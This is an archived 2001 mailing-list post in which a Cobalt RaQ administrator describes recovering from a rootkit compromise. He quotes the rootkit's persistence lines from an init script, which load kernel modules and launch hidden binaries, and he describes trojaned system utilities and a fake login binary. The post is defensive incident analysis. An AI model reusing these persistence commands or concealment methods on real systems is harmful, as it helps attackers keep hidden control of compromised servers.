[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[cobalt-users] Recent Hacks (resolution in sight)

Subject: [cobalt-users] Recent Hacks (resolution in sight)
From: "inc" <inc@xxxxxxxxxxxxx>
Date: Fri Feb 9 03:44:06 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

thanks to those who maintained email with me today; it's been a great help.

here's my report:


i've successfully (touch wood) used the unhack.pl script recommended by
Steve Bassi via Mike Fritsch.

after running unhack.pl, there's one file that unhack said was neither
hacked (according to its internal MD5 checksums) nor "original" cobalt.

this file, /etc/rc.d/init.d/network contains the following which i would say
is part of the hack.

        /usr/bin/ssh2d -q
        if test -f "/dev/kmod"; then
        /sbin/insmod -f /usr/lib/crth.o
        /sbin/insmod -f /usr/lib/crtz.o
        fi
        if test -f /lib/security/.config/sn ; then
        cd /lib/security/.config;./lpsched
        fi
        touch /var/lock/subsys/network
        if test -f "/dev/dos"; then
        /usr/lib/lpq
        fi
        ;;


i've not installed ssh2d, and crth.o and crtz.o look damned nasty to me.
note that unhack.pl DOESN'T clear up crtz.o.  can anyone shed some light on
the remaining commands there?  i've disabled all these lines until i know
what they are.  my "network" script was considerably more complicated than
the "network" script included with unhack.tar.gz

i also spent the whole day studying up on cracking and studying the scripts
and binaries that were placed on my raq.

the only weird thing i could find in my logs was an ftp login from korea.  i
have not published any ftp site urls anywhere, and this is the only ftp
login i've ever seen in the logs apart from my own, and the 127.0.0.1
entries used by the admin.  this ftp login occurred 4 hours before the
rootkit was activated.

so i would think that proftpd was exploited to gain root access.

all log entries bar the ftp one above were cleaned up, but there were
footsteps left behind in /.bash_history which reflected an rcp download from
a us .edu site.

at this point ps, su, all manner of executables are replaced to hide any
unusual activity.  flash22 suggested i try "top" -- which lo and behold
turned up all my logins running as "/bin/xlogin" -- which appeared to be a
copy of the original cobalt "/bin/login" .. a file /etc/ld.so.hash seems to
have a crypted password in it.  the replaced "/bin/login" was a very small
file next to the original cobalt "/bin/login".


i'm happy to answer any questions on this.

thanks again to those who helped me climb out of the black hole!


--
chris paul
fastmedia.net

Follow-Ups:
- RE: [cobalt-users] Recent Hacks (resolution in sight)
  - From: Chris Mason
- Re: [cobalt-users] Recent Hacks (resolution in sight)
  - From: John Shireley

Prev by Date: Re: [cobalt-users] Migrating from a RaQ3 to a RaQ4i
Next by Date: RE: [cobalt-users] Re: Frontpage Extensions for Site Users -SOLVED- ThankYou ThankYou ThankYou
Previous by thread: [cobalt-users] Packages Problem installing
Next by thread: RE: [cobalt-users] Recent Hacks (resolution in sight)

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index